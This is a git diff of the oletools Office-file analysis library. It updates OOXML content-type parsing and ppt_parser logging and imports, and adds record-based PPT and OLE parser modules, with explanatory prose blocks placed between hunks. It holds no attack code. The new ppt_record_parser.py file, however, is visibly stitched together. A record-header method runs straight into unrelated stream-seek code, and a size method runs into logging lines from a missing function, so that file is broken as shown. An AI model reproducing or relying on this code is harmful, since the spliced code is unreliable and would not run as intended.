+ - files is a dict that maps file-name --> content-type
+ - defaults is a dict that maps extension --> content-type
+
+ No guarantees on accuracy of these content types!
+ """
+ if self.is_single_xml():
+ return {}, {}
+
+ defaults = []
+ files = []
+ try:
+ for _, elem, _ in self.iter_xml(FILE_CONTENT_TYPES):
+ if elem.tag.endswith('Default'):
+ extension = elem.attrib['Extension']
+ if extension.startswith('.'):
+ extension = extension[1:]
+ defaults.append((extension, elem.attrib['ContentType']))
+ logger.debug('found content type for extension {0[0]}: '
+ '{0[1]}'.format(defaults[-1]))
+ elif elem.tag.endswith('Override'):
+ subfile = elem.attrib['PartName']
+ if subfile.startswith('/'):
+ subfile = subfile[1:]
+ files.append((subfile, elem.attrib['ContentType']))
+ logger.debug('found content type for subfile {0[0]}: '
+ '{0[1]}'.format(files[-1]))
+ except BadOOXML as oo_err:
+ if oo_err.more_info.startswith('invalid subfile') and \
+ FILE_CONTENT_TYPES in oo_err.more_info:
+ # no FILE_CONTENT_TYPES in zip, so probably no ms office xml.
+ # Maybe OpenDocument format? In any case, try to analyze.
+ pass
+ else:
+ raise
+ return dict(files), dict(defaults)
+
+ def iter_non_xml(self):
+ """ retrieve subfiles that were found by iter_xml to be non-xml
+
+ also looks for content type info in the [Content_Types].xml subfile.
+
+ yields 3-tuples (filename, content_type, file_handle) where
+ content_type is based on filename or default for extension or is None,
+ and file_handle is a ZipSubFile. Caller does not have to care about
+ closing handle, will be closed even in error condition.
+
+ To handle binary parts of an xlsb file, use xls_parser.parse_xlsb_part
+ """
+ if not self.did_iter_all:
+ logger.warning('Did not iterate through complete file. '
+ 'Should run iter_xml() without args first.')
+ if not self.subfiles_no_xml:
+ return
+
+ # case of single xml files (office 2003+)
+ if self.is_single_xml():
+ return
+
+ content_types, content_defaults = self.get_content_types()
+
+ with ZipFile(self.filename) as zipper:
+ for subfile in self.subfiles_no_xml:
+ if subfile.startswith('/'):
+ subfile = subfile[1:]
+ content_type = None
+ if subfile in content_types:
+ content_type = content_types[subfile]
+ else:
+ extension = splitext(subfile)[1]
+ if extension.startswith('.'):
+ extension = extension[1:] # remove the '.'
+ if extension in content_defaults:
+ content_type = content_defaults[extension]
+ with ZipSubFile(zipper, subfile) as handle:
+ yield subfile, content_type, handle
+
+
+def test():
+ """
+ Test xml parsing; called when running this file as a script.
+
+ Prints every element found in input file (to be given as command line arg).
+ """
+ log_helper.enable_logging(False, 'debug')
+ if len(sys.argv) != 2:
+ print(u'To test this code, give me a single file as arg')
+ return 2
+
+ # test get_type
+ print('Detected type: ' + get_type(sys.argv[1]))
+
+ # test complete parsing
+ parser = XmlParser(sys.argv[1])
+ for subfile, elem, depth in parser.iter_xml():
+ if depth < 4:
+ print(u'{0} {1}{2}'.format(subfile, ' ' * depth, debug_str(elem)))
+ for index, (subfile, content_type, _) in enumerate(parser.iter_non_xml()):
+ print(u'Non-XML subfile: {0} of type {1}'
+ .format(subfile, content_type or u'unknown'))
+ if index > 100:
+ print(u'...')
+ break
+
+ log_helper.end_logging()
+
+ return 0
+
+
+if __name__ == '__main__':
+ sys.exit(test())
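The memory-saving approach in `iter_xml()` above, clearing each element once its 'end' event fires, is the standard `iterparse` idiom from the IBM developerWorks article it cites. A standalone sketch of the depth-tracking and clearing pattern, outside the patch itself (the sample XML is made up):

```python
import io
import xml.etree.ElementTree as ET

xml_data = b'<root><a>1</a><b><c>2</c></b></root>'

depth = 0
seen = []
for event, elem in ET.iterparse(io.BytesIO(xml_data), events=('start', 'end')):
    if event == 'start':
        depth += 1
        continue
    depth -= 1
    seen.append((elem.tag, depth))   # containers come after their children
    elem.clear()                     # free text/children the parser kept

print(seen)  # [('a', 1), ('c', 2), ('b', 1), ('root', 0)]
```

Note how `root` is yielded last at depth 0: with 'end' events, a parent only completes after all of its children, which is why `iter_xml()` warns callers that need children to set `need_children=True` and forgo the `clear()` optimization.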
diff --git a/oletools/ppt_parser.py b/oletools/ppt_parser.py
index e8ef6063..fa1fd29a 100644
--- a/oletools/ppt_parser.py
+++ b/oletools/ppt_parser.py
@@ -6,11 +6,19 @@
(possibly slightly excessively so)
Currently quite narrowly focused on extracting VBA from ppt files, no slides or
-stuff, but built to be extended to parsing more/all of the file
+stuff, but built to be extended to parsing more/all of the file. For better
+"understanding" of ppt files, see module ppt_record_parser, which will probably
+replace this module some time soon.
References:
* https://msdn.microsoft.com/en-us/library/dd921564%28v=office.12%29.aspx
and links there-in
+
+WARNING!
+Before thinking about understanding or even extending this module, please keep
+in mind that module ppt_record_parser has a better "understanding" of the ppt
+file structure and will replace this module some time soon!
+
"""
# === LICENSE =================================================================
@@ -24,6 +32,7 @@
# - license
# - make buffered stream from output of iterative_decompress
# - maybe can merge the 2 decorators into 1? (with_opened_main_stream)
+# - REPLACE THIS MODULE with ppt_record_parser
# CHANGELOG:
@@ -32,8 +41,9 @@
# 2016-09-13 PL: - fixed olefile import for Python 2+3
# - fixed format strings for Python 2.6 (issue #75)
# 2017-04-23 v0.51 PL: - fixed absolute imports and issue #101
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
-__version__ = '0.51'
+__version__ = '0.54'
# --- IMPORTS ------------------------------------------------------------------
@@ -57,11 +67,41 @@
if not _parent_dir in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty.olefile import olefile
+import olefile
+
+
+# TODO: this is a temporary fix until all logging features are unified in oletools
+def get_logger(name, level=logging.CRITICAL+1):
+ """
+ Create a suitable logger object for this module.
+ The goal is not to change settings of the root logger, to avoid getting
+ other modules' logs on the screen.
+ If a logger exists with same name, reuse it. (Else it would have duplicate
+ handlers and messages would be doubled.)
+ The level is set to CRITICAL+1 by default, to avoid any logging.
+ """
+ # First, test if there is already a logger with the same name, else it
+ # will generate duplicate messages (due to duplicate handlers):
+ if name in logging.Logger.manager.loggerDict:
+ #NOTE: another less intrusive but more "hackish" solution would be to
+ # use getLogger then test if its effective level is not default.
+ logger = logging.getLogger(name)
+ # make sure level is OK:
+ logger.setLevel(level)
+ return logger
+ # get a new logger:
+ logger = logging.getLogger(name)
+ # only add a NullHandler for this logger, it is up to the application
+ # to configure its own logging:
+ logger.addHandler(logging.NullHandler())
+ logger.setLevel(level)
+ return logger
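The dedup check in `get_logger()` above relies on `logging` caching loggers by name in `logging.Logger.manager.loggerDict`, so a second call for the same name must not attach a second handler. A condensed sketch of that pattern, separate from the patch (the function and logger names are hypothetical):

```python
import logging

def get_silent_logger(name, level=logging.CRITICAL + 1):
    """Return a per-module logger that stays silent until the app configures logging."""
    already_exists = name in logging.Logger.manager.loggerDict
    logger = logging.getLogger(name)              # same object on every call
    if not already_exists:
        logger.addHandler(logging.NullHandler())  # add NullHandler only once
    logger.setLevel(level)
    return logger

first = get_silent_logger('demo.module')
second = get_silent_logger('demo.module')
print(first is second)        # True: logging returned the cached logger
print(len(first.handlers))    # 1: no duplicate NullHandler
```

Setting the level above CRITICAL keeps library code quiet by default, leaving it to the application (e.g. `enable_logging()`) to lower the level when debug output is wanted.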
+
+
# a global logger object used for debugging:
-log = olefile.get_logger('ppt')
+log = get_logger('ppt')
def enable_logging():
@@ -1414,7 +1454,7 @@ def search_vba_info(self, stream):
.. seealso:: search_vba_storage
"""
- logging.debug('looking for VBA info containers')
+ log.debug('looking for VBA info containers')
pattern = VBAInfoContainer.generate_pattern(
rec_len=VBAInfoContainer.RECORD_LENGTH) \
@@ -1466,7 +1506,7 @@ def search_vba_storage(self, stream):
.. seealso:: :py:meth:`search_vba_info`
"""
- logging.debug('looking for VBA storage objects')
+ log.debug('looking for VBA storage objects')
for obj_type in (ExternalObjectStorageUncompressed,
ExternalObjectStorageCompressed):
# re-position stream at start
diff --git a/oletools/ppt_record_parser.py b/oletools/ppt_record_parser.py
new file mode 100644
index 00000000..f8d54eae
--- /dev/null
+++ b/oletools/ppt_record_parser.py
@@ -0,0 +1,722 @@
+#!/usr/bin/env python
+
+"""
+ppt_record_parser.py
+
+Alternative to ppt_parser.py that works on records
+"""
+
+# === LICENSE =================================================================
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice,
+# this list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
+
+# -----------------------------------------------------------------------------
+# CHANGELOG:
+# 2017-11-30 v0.01 CH: - first version, can be used in oledump
+
+# -----------------------------------------------------------------------------
+# TODO:
+# - provide stuff from ppt_parser as well and replace it
+
+# -----------------------------------------------------------------------------
+# REFERENCES:
+# - [MS-PPT]
+
+
+import sys
+from struct import unpack # unsigned: 1 Byte = B, 2 Byte = H, 4 Byte = L
+import logging
+import io
+import zlib
+
+# IMPORTANT: it should be possible to run oletools directly as scripts
+# in any directory without installing them with pip or setup.py.
+# In that case, relative imports are NOT usable.
+# And to enable Python 2+3 compatibility, we need to use absolute imports,
+# so we add the oletools parent folder to sys.path (absolute+normalized path):
+try:
+ from oletools import record_base
+except ImportError:
+ import os.path
+ PARENT_DIR = os.path.normpath(os.path.dirname(os.path.dirname(
+ os.path.abspath(__file__))))
+ if PARENT_DIR not in sys.path:
+ sys.path.insert(0, PARENT_DIR)
+ del PARENT_DIR
+ from oletools import record_base
+
+
+# types of relevant records (there are much more than listed here)
+RECORD_TYPES = dict([
+ # file structure types
+ (0x0ff5, 'UserEditAtom'),
+ (0x0ff6, 'CurrentUserAtom'), # --> use PptRecordCurrentUser instead
+ (0x1772, 'PersistDirectoryAtom'),
+ (0x2f14, 'CryptSession10Container'),
+ # document types
+ (0x03e8, 'DocumentContainer'),
+ (0x0fc9, 'HandoutContainer'),
+ (0x03f0, 'NotesContainer'),
+ (0x03ff, 'VbaInfoContainer'),
+ (0x03e9, 'DocumentAtom'),
+ (0x03ea, 'EndDocumentAtom'),
+ # slide types
+ (0x03ee, 'SlideContainer'),
+ (0x03f8, 'MainMasterContainer'),
+ # external object types
+ (0x0409, 'ExObjListContainer'),
+ (0x1011, 'ExOleVbaActiveXAtom'), # --> use PptRecordExOleVbaActiveXAtom
+ (0x1006, 'ExAviMovieContainer'),
+ (0x100e, 'ExCDAudioContainer'),
+ (0x0fee, 'ExControlContainer'),
+ (0x0fd7, 'ExHyperlinkContainer'),
+ (0x1007, 'ExMCIMovieContainer'),
+ (0x100d, 'ExMIDIAudioContainer'),
+ (0x0fcc, 'ExOleEmbedContainer'),
+ (0x0fce, 'ExOleLinkContainer'),
+ (0x100f, 'ExWAVAudioEmbeddedContainer'),
+ (0x1010, 'ExWAVAudioLinkContainer'),
+ (0x1004, 'ExMediaAtom'),
+ (0x040a, 'ExObjListAtom'),
+ (0x0fcd, 'ExOleEmbedAtom'),
+ (0x0fc3, 'ExOleObjAtom'), # --> use PptRecordExOleObjAtom instead
+ # other types
+ (0x0fc1, 'MetafileBlob'),
+ (0x0fb8, 'FontEmbedDataBlob'),
+ (0x07e7, 'SoundDataBlob'),
+ (0x138b, 'BinaryTagDataBlob'),
+ (0x0fba, 'CString'),
+])
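Each of the record types listed above is identified by an 8-byte header, per the [MS-PPT] RecordHeader structure: 2 bytes combining recVer (low 4 bits) and recInstance (high 12 bits), 2 bytes recType, 4 bytes recLen, all little-endian. A sketch of splitting it (field order matches the version/instance handling in this module):

```python
from struct import unpack

def parse_record_header(head):
    """Split an 8-byte [MS-PPT] RecordHeader into its fields."""
    ver_inst, rec_type, rec_len = unpack('<HHL', head)
    # low 4 bits are recVer, high 12 bits are recInstance
    instance, version = divmod(ver_inst, 2 ** 4)
    return version, instance, rec_type, rec_len

# header of a DocumentContainer (type 0x03e8), 16 bytes of data, recVer 0xf
fields = parse_record_header(b'\x0f\x00\xe8\x03\x10\x00\x00\x00')
```

Version 0xf conventionally marks a container record, which is why the `VERSION_EXCEPTIONS` table above only lists types deviating from 0x0/0x1/0xf.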
+
+
+# record types where version is not 0x0 or 0x1 or 0xf
+VERSION_EXCEPTIONS = dict([
+ (0x0400, 2), # rt_vbainfoatom
+ (0x03ef, 2), # rt_slideatom
+ (0xe9c7, 7), # tests/test-data/encrypted/encrypted.ppt, not investigated
+])
+
+
+# record types where instance is not 0x0 or 0x1
+INSTANCE_EXCEPTIONS = dict([
+ (0x0fba, (2, 0x14)), # rt_cstring,
+ (0x0ff0, (2, 2)), # rt_slidelistwithtext,
+ (0x0fd9, (3, 4)), # rt_headersfooters,
+ (0x07e4, (5, 5)), # rt_soundcollection,
+ (0x03fb, (7, 7)), # rt_guideatom,
+ (0x07e9, (2, 2)), # rt_bookmarkseeatom,
+ (0x07f0, (6, 6)), # rt_colorschemeatom,
+ (0xf125, (0, 5)), # rt_timeconditioncontainer,
+ (0xf13d, (0, 0xa)), # rt_timepropertylist,
+ (0x0fc8, (2, 2)), # rt_kinsoku,
+ (0x0fd2, (3, 3)), # rt_kinsokuatom,
+ (0x0f9f, (0, 5)), # rt_textheaderatom,
+ (0x0fb7, (0, 128)), # rt_fontentityatom,
+ (0x0fa3, (0, 8)), # rt_textmasterstyleatom,
+ (0x0fad, (0, 8)), # rt_textmasterstyle9atom,
+ (0x0fb2, (0, 8)), # rt_textmasterstyle10atom,
+ (0x07f9, (0, 0x80)), # rt_blibentitiy9atom,
+ (0x0faf, (0, 5)), # rt_outlinetextpropsheader9atom,
+ (0x0fb8, (0, 3)), # rt_fontembeddatablob,
+])
+
+
+def is_ppt(filename):
+ """ determine whether given file is a PowerPoint 2003 (ppt) OLE file
+
+ Tries to parse the file as ppt; returns False if that fails. Looks for certain
+ required streams and records.
+
+ Param filename can be anything that OleFileIO constructor accepts: name of
+ file or file data or data stream.
+
+ Will not try to decrypt the file, nor even determine whether it is
+ encrypted. If the file is encrypted, this will either raise an error or just
+ return `False`.
+
+ see also: oleid.OleID.check_powerpoint
+ """
+ have_current_user = False
+ have_user_edit = False
+ have_persist_dir = False
+ have_document_container = False
+ ppt_file = None
+ try:
+ ppt_file = PptFile(filename)
+ for stream in ppt_file.iter_streams():
+ if stream.name == 'Current User':
+ for record in stream.iter_records():
+ if isinstance(record, PptRecordCurrentUser):
+ have_current_user = True
+ if have_current_user and have_user_edit and \
+ have_persist_dir and have_document_container:
+ return True
+ elif stream.name == 'PowerPoint Document':
+ for record in stream.iter_records():
+ if record.type == 0x0ff5: # UserEditAtom
+ have_user_edit = True
+ elif record.type == 0x1772: # PersistDirectoryAtom
+ have_persist_dir = True
+ elif record.type == 0x03e8: # DocumentContainer
+ have_document_container = True
+ else:
+ continue
+ if have_current_user and have_user_edit and \
+ have_persist_dir and have_document_container:
+ return True
+ else: # ignore other streams/storages since they are optional
+ continue
+ except Exception as exc:
+ logging.debug('Ignoring exception in is_ppt, assume is not ppt',
+ exc_info=True)
+ finally:
+ if ppt_file is not None:
+ ppt_file.close()
+ return False
+
+
+class PptFile(record_base.OleRecordFile):
+ """ Record-based view on a PowerPoint ppt file
+
+ This is a subclass of OleFileIO, so can be constructed from file name or
+ file data or data stream.
+ """
+
+ @classmethod
+ def stream_class_for_name(cls, stream_name):
+ return PptStream
+
+
+class PptStream(record_base.OleRecordStream):
+ """ a stream of records in a ppt file """
+
+ def read_record_head(self):
+ """ read first few bytes of record to determine size and type
+
+ returns (type, size, other) where other is (instance, version)
+ """
+ ver_inst, rec_type, rec_size = unpack('<HHL', self.stream.read(8))
+ instance, version = divmod(ver_inst, 2 ** 4)
+ return rec_type, rec_size, (instance, version)
+ if offset > self.curr_pos:
+ self.readinto(bytearray(offset - self.curr_pos))
+ elif offset == self.curr_pos:
+ pass
+ else: # need to re-create iterable
+ self.reset()
+ self.readinto(bytearray(offset))
+ if self.curr_pos != offset:
+ # logging.debug('IterStream: curr_pos {0} != offset {1}!'
+ # .format(self.curr_pos, offset))
+ raise RuntimeError('programming error in IterStream.tell!')
+ return self.curr_pos
+ elif whence == io.SEEK_END: # seek to end
+ # logging.debug('IterStream: seek to end')
+ if self.size is None:
+ # logging.debug('IterStream: trying to seek to end but size '
+ # 'unknown --> raise IOError')
+ raise IOError('size unknown, cannot seek to end')
+ self.at_end = True # fake jumping to the end
+ self.iterable = None # cannot safely be used any more
+ self.leftover = None
+ return self.size
+ elif whence == io.SEEK_SET: # seek to start
+ # logging.debug('IterStream: seek to start')
+ self.reset()
+ return 0
+ elif whence == io.SEEK_CUR: # e.g. called by tell()
+ # logging.debug('IterStream: seek to curr pos')
+ if self.at_end:
+ return self.size
+ return self.curr_pos
+ elif whence not in (io.SEEK_SET, io.SEEK_CUR, io.SEEK_END):
+ # logging.debug('Illegal 2nd argument to seek(): {0}'
+ # .format(whence))
+ raise IOError('Illegal 2nd argument to seek(): {0}'.format(whence))
+ else:
+ # logging.debug('not implemented: {0}, {1}'.format(offset, whence))
+ raise NotImplementedError('seek only partially implemented. '
+ 'Cannot yet seek to {0} from {1}'
+ .format(offset, whence))
+
+ def close(self):
+ self.iterable = None
+ self.leftover = None
+ self.at_end = False
+ self.curr_pos = 0
+
+
+class PptRecordExOleVbaActiveXAtom(PptRecord):
+ """ record that contains and ole object / vba storage / active x control
+
+ Contains the actual data of the ole object / VBA storage / ActiveX control
+ in compressed or uncompressed form.
+
+ Corresponding types in [MS-PPT]:
+ ExOleObjStg, ExOleObjStgUncompressedAtom, ExOleObjStgCompressedAtom,
+ VbaProjectStg, VbaProjectStgUncompressedAtom, VbaProjectStgCompressedAtom,
+ ExControlStg, ExControlStgUncompressedAtom, ExControlStgCompressedAtom.
+
+ self.data is "An array of bytes that specifies a structured storage
+ (described in [MSDN-COM]) for the OLE object / ActiveX control / VBA
+ project ([MS-OVBA] section 2.2.1)."
+ If compressed, "The original bytes of the storage are compressed by the
+ algorithm specified in [RFC1950] and are decompressed by the algorithm
+ specified in [RFC1951]." (--> meaning zlib)
+ "Office Forms ActiveX controls are specified in [MS-OFORMS]."
+
+ To determine whether this is an OLE object, an ActiveX control or a VBA
+ storage, one needs to find the corresponding PptRecordExOleObjAtom.
+ TODO: do that!
+ """
+
+ TYPE = 0x1011
+
+ def is_compressed(self):
+ """ determine whether data is compressed or uncompressed """
+ return self.instance == 1
+
+ def get_uncompressed_size(self):
+ """ Get size of data in uncompressed form
+
+ For uncompressed data, this just returns self.size. For compressed
+ data, this reads and returns the decompressedSize field value from
+ self.data. Raises a value error if compressed and data is not
+ available.
+ """
+ if not self.is_compressed():
+ return self.size
+ elif self.data is None:
+ raise ValueError('Data not read from record')
+ else:
+ return unpack('<L', self.data[:4])[0]
+ logging.info('{4}--> crypt: {0}, offset {1}, user {2}/{3}'
+ .format(record.is_document_encrypted(),
+ record.offset_to_current_edit,
+ repr(record.ansi_user_name),
+ repr(record.unicode_user_name),
+ ' ' * indent))
+ elif isinstance(record, PptRecordExOleObjAtom):
+ logging.info('{2}--> obj id {0}, persist id ref {1}'
+ .format(record.ex_obj_id, record.persist_id_ref,
+ ' ' * indent))
+ elif isinstance(record, PptRecordExOleVbaActiveXAtom):
+ ole = record.get_data_as_olefile()
+ for entry in ole.listdir():
+ logging.info('{0}ole entry {1}'.format(' ' * indent, entry))
+
+
+if __name__ == '__main__':
+ def do_per_record(record):
+ print_records(record, logging.info, 2, False)
+ sys.exit(record_base.test(sys.argv[1:], PptFile,
+ do_per_record=do_per_record,
+ verbose=False))
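As the `PptRecordExOleVbaActiveXAtom` docstring notes, compressed storages are RFC1950/1951 streams, i.e. plain zlib, and the compressed atom data carries a 4-byte decompressedSize field in front of the stream. A hedged round-trip sketch of that layout:

```python
import zlib
from struct import pack, unpack

def decompress_storage(record_data):
    # first 4 bytes: decompressedSize, rest: zlib (RFC1950) stream
    decomp_size = unpack('<L', record_data[:4])[0]
    storage = zlib.decompress(record_data[4:])
    if len(storage) != decomp_size:
        raise ValueError('decompressed size does not match header field')
    return storage

# round-trip with dummy storage bytes (starting with the OLE magic)
payload = b'\xd0\xcf\x11\xe0' + b'\x00' * 12
blob = pack('<L', len(payload)) + zlib.compress(payload)
```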
diff --git a/oletools/pyxswf.py b/oletools/pyxswf.py
index c6b6030a..63861db9 100644
--- a/oletools/pyxswf.py
+++ b/oletools/pyxswf.py
@@ -25,7 +25,7 @@
#=== LICENSE =================================================================
-# pyxswf is copyright (c) 2012-2016, Philippe Lagadec (http://www.decalage.info)
+# pyxswf is copyright (c) 2012-2019, Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -57,8 +57,9 @@
# 2016-09-06 v0.50 PL: - updated to match the rtfobj API
# 2016-10-25 PL: - fixed print for Python 3
# 2016-11-01 PL: - replaced StringIO by BytesIO for Python 3
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
-__version__ = '0.50'
+__version__ = '0.54'
#------------------------------------------------------------------------------
# TODO:
@@ -78,7 +79,7 @@
from . import rtfobj
from io import BytesIO
from .thirdparty.xxxswf import xxxswf
-from .thirdparty import olefile
+import olefile
#=== MAIN =================================================================
diff --git a/oletools/record_base.py b/oletools/record_base.py
new file mode 100644
index 00000000..db96a63e
--- /dev/null
+++ b/oletools/record_base.py
@@ -0,0 +1,383 @@
+#!/usr/bin/env python
+
+"""
+record_base.py
+
+Common stuff for ole files whose streams are a sequence of record structures.
+This is the case for xls and ppt, so classes are bases for xls_parser.py and
+ppt_record_parser.py.
+"""
+
+# === LICENSE ==================================================================
+
+# record_base is copyright (c) 2014-2019 Philippe Lagadec (http://www.decalage.info)
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice,
+# this list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
+
+from __future__ import print_function
+
+# -----------------------------------------------------------------------------
+# CHANGELOG:
+# 2017-11-30 v0.01 CH: - first version based on xls_parser
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
+# 2019-01-30 PL: - fixed import to avoid mixing installed oletools
+# and dev version
+
+__version__ = '0.54'
+
+# -----------------------------------------------------------------------------
+# TODO:
+# - read DocumentSummaryInformation first to get more info about streams
+# (maybe content type or so; identify streams that are never record-based)
+# Or use oleid to avoid same functionality in several files
+# - think about integrating this with olefile itself
+
+# -----------------------------------------------------------------------------
+# REFERENCES:
+# - [MS-XLS]: Excel Binary File Format (.xls) Structure Specification
+# https://msdn.microsoft.com/en-us/library/office/cc313154(v=office.14).aspx
+# - Understanding the Excel .xls Binary File Format
+# https://msdn.microsoft.com/en-us/library/office/gg615597(v=office.14).aspx
+# - [MS-PPT]
+
+
+import sys
+import os.path
+from io import SEEK_CUR
+import logging
+
+import olefile
+
+# little hack to allow absolute imports even if oletools is not installed.
+PARENT_DIR = os.path.normpath(os.path.dirname(os.path.dirname(
+ os.path.abspath(__file__))))
+if PARENT_DIR not in sys.path:
+ sys.path.insert(0, PARENT_DIR)
+del PARENT_DIR
+from oletools import oleid
+
+
+###############################################################################
+# Helpers
+###############################################################################
+
+OleFileIO = olefile.OleFileIO
+STGTY_EMPTY = olefile.STGTY_EMPTY # 0
+STGTY_STORAGE = olefile.STGTY_STORAGE # 1
+STGTY_STREAM = olefile.STGTY_STREAM # 2
+STGTY_LOCKBYTES = olefile.STGTY_LOCKBYTES # 3
+STGTY_PROPERTY = olefile.STGTY_PROPERTY # 4
+STGTY_ROOT = olefile.STGTY_ROOT # 5
+STGTY_SUBSTREAM = 10
+
+ENTRY_TYPE2STR = {
+ olefile.STGTY_EMPTY: 'empty',
+ olefile.STGTY_STORAGE: 'storage',
+ olefile.STGTY_STREAM: 'stream',
+ olefile.STGTY_LOCKBYTES: 'lock-bytes',
+ olefile.STGTY_PROPERTY: 'property',
+ olefile.STGTY_ROOT: 'root',
+ STGTY_SUBSTREAM: 'substream'
+}
+
+
+def enable_olefile_logging():
+ """ enable logging olefile e.g., to get debug info from OleFileIO """
+ olefile.enable_logging()
+
+
+###############################################################################
+# Base Classes
+###############################################################################
+
+
+SUMMARY_INFORMATION_STREAM_NAMES = ('\x05SummaryInformation',
+ '\x05DocumentSummaryInformation')
+
+
+class OleRecordFile(olefile.OleFileIO):
+ """ an OLE compound file whose streams have (mostly) record structure
+
+ 'record structure' meaning that streams are a sequence of records. Records
+ are structures with information about type and size in their first bytes,
+ followed by type-dependent data of the given size.
+
+ Subclass of OleFileIO!
+ """
+
+ def open(self, filename, *args, **kwargs):
+ """Call OleFileIO.open."""
+ #super(OleRecordFile, self).open(filename, *args, **kwargs)
+ OleFileIO.open(self, filename, *args, **kwargs)
+
+ @classmethod
+ def stream_class_for_name(cls, stream_name):
+ """ helper for iter_streams, must be overwritten in subclasses
+
+ will not be called for SUMMARY_INFORMATION_STREAM_NAMES
+ """
+ return OleRecordStream # this is an abstract class!
+
+ def iter_streams(self):
+ """ find all streams, including orphans """
+ logging.debug('Finding streams in ole file')
+
+ for sid, direntry in enumerate(self.direntries):
+ is_orphan = direntry is None
+ if is_orphan:
+ # this direntry is not part of the tree --> unused or orphan
+ direntry = self._load_direntry(sid)
+ is_stream = direntry.entry_type == olefile.STGTY_STREAM
+ logging.debug('direntry {:2d} {}: {}'.format(
+ sid, '[orphan]' if is_orphan else direntry.name,
+ 'is stream of size {}'.format(direntry.size) if is_stream else
+ 'no stream ({})'.format(ENTRY_TYPE2STR[direntry.entry_type])))
+ if is_stream:
+ if not is_orphan and \
+ direntry.name in SUMMARY_INFORMATION_STREAM_NAMES:
+ clz = OleSummaryInformationStream
+ else:
+ clz = self.stream_class_for_name(direntry.name)
+ stream = clz(self._open(direntry.isectStart, direntry.size),
+ direntry.size,
+ None if is_orphan else direntry.name,
+ direntry.entry_type)
+ yield stream
+ stream.close()
+
+
+class OleRecordStream(object):
+ """ a stream found in an OleRecordFile
+
+ Always has a name and a size (both read-only). Has an OleFileStream handle.
+
+ abstract base class
+ """
+
+ def __init__(self, stream, size, name, stream_type):
+ self.stream = stream
+ self.size = size
+ self.name = name
+ if stream_type not in ENTRY_TYPE2STR:
+ raise ValueError('Unknown stream type: {0}'.format(stream_type))
+ self.stream_type = stream_type
+
+ def read_record_head(self):
+ """ read first few bytes of record to determine size and type
+
+ Abstract base method, to be implemented in subclasses.
+
+ returns (rec_type, rec_size, other) where other will be forwarded to
+ record constructors
+ """
+ raise NotImplementedError('Abstract method '
+ 'OleRecordStream.read_record_head called')
+
+ @classmethod
+ def record_class_for_type(cls, rec_type):
+ """ determine a class for given record type
+
+ Only a base implementation. Create subclasses of OleRecordBase and
+ return those when appropriate.
+
+ returns (clz, force_read)
+ """
+ return OleRecordBase, False
+
+ def iter_records(self, fill_data=False):
+ """ yield all records in this stream
+
+ Stream must be positioned at start of records (e.g. start of stream).
+ """
+ while True:
+ # unpacking as in olevba._extract_vba
+ pos = self.stream.tell()
+ if pos >= self.size:
+ break
+
+ # read first few bytes, determine record type and size
+ rec_type, rec_size, other = self.read_record_head()
+ # logging.debug('Record type {0} of size {1}'
+ # .format(rec_type, rec_size))
+
+ # determine what class to wrap this into
+ rec_clz, force_read = self.record_class_for_type(rec_type)
+
+ if fill_data or force_read:
+ data = self.stream.read(rec_size)
+ if len(data) != rec_size:
+ raise IOError('Unexpected end of stream ({0} < {1})'
+ .format(len(data), rec_size))
+ else:
+ self.stream.seek(rec_size, SEEK_CUR)
+ data = None
+ rec_object = rec_clz(rec_type, rec_size, other, pos, data)
+
+ # "We are microsoft, we do not always adhere to our specifications"
+ rec_object.read_some_more(self.stream)
+ yield rec_object
+
+ def close(self):
+ self.stream.close()
+
+ def __str__(self):
